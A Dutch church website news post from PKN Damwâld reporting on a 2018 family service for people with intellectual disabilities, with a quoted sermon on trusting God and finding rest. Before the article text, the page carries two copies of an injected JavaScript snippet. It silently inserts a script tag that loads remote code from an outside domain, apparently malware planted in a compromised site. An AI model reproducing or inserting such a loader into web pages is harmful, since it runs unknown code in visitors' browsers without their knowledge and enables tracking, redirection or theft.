;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uitrusten bij God ... een bijzondere gezinsdienst ! - PKN Damwâld

Uitrusten bij God … een bijzondere gezinsdienst !

Gepubliceerd op: maandag 4 juni 2018

De Ikker in Damwâld was afgelopen zondagmiddag het decor voor een feestelijke en bijzondere gezinsdienst. Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Het thema dit keer was ‘Uitrusten’. Ds. G. Timmer uit Twijzelerheide ging voor en zanger/gitarist Klaas Steegstra zong prachtige luisterliedjes en uiteraard ook een paar heerlijke ‘meezingers’. Het werd een prachtige dienst met veel enthousiasme, afwisseling en een heldere Bijbelse boodschap.

‘Als je gelooft in God, geef je je leven eigenlijk uit handen. Daar is lef voor nodig en vertrouwen. Je kunt voor uitdagingen komen te staan. De grootste uitdaging: durven vertrouwen. Jij kunt niet in de toekomst kijken. Maar je kunt wel kiezen om de toekomst tegemoet te gaan aan de hand van God. Zou God dan jouw veilige haven kunnen worden en kun je dan tot rust komen? Als je helemaal op je gemak bent en je veilig voelt, kun je ‘uitrusten’. Dat kan op een plek zijn (bijvoorbeeld je eigen kamer) of als er vertrouwde mensen bij je zijn (je ouders, vriendjes). Als God bij je is, ben je veilig, waar je ook bent: op school, thuis, onderweg. Dus eigenlijk zorgt God ervoor dat je altijd, overal kunt uitrusten. Want Hij is altijd bij je en dus ben je veilig. Zijn naam betekent: Hij was er altijd, is er nu, en zal er ook altijd zijn. Als je iets spannend vindt of bang bent, God is bij je en wil je helpen. Als Hij iets belooft, doet Hij het ook. Misschien wel op een andere manier dan jij zou denken. Hij lost niet alles meteen op, maar wil graag dat je bij Hem komt met je angst, je verdriet, je vragen zodat jullie elkaar steeds beter leren kennen en vertrouwen. Hij kan op veel verschillende manieren helpen: genezen, troosten, je sterker maken, mensen sturen die jou helpen. Soms gebruikt God zelfs iets verdrietigs, om mensen te leren dat ze Hem nodig hebben. God belooft niet dat je altijd alleen maar 100% gelukkig zal zijn (dat komt later, op de nieuwe aarde). Hij belooft wel dat Hij er altijd voor je zal zijn. Bij Hem ben je veilig. Dit kun je zelf ervaren’.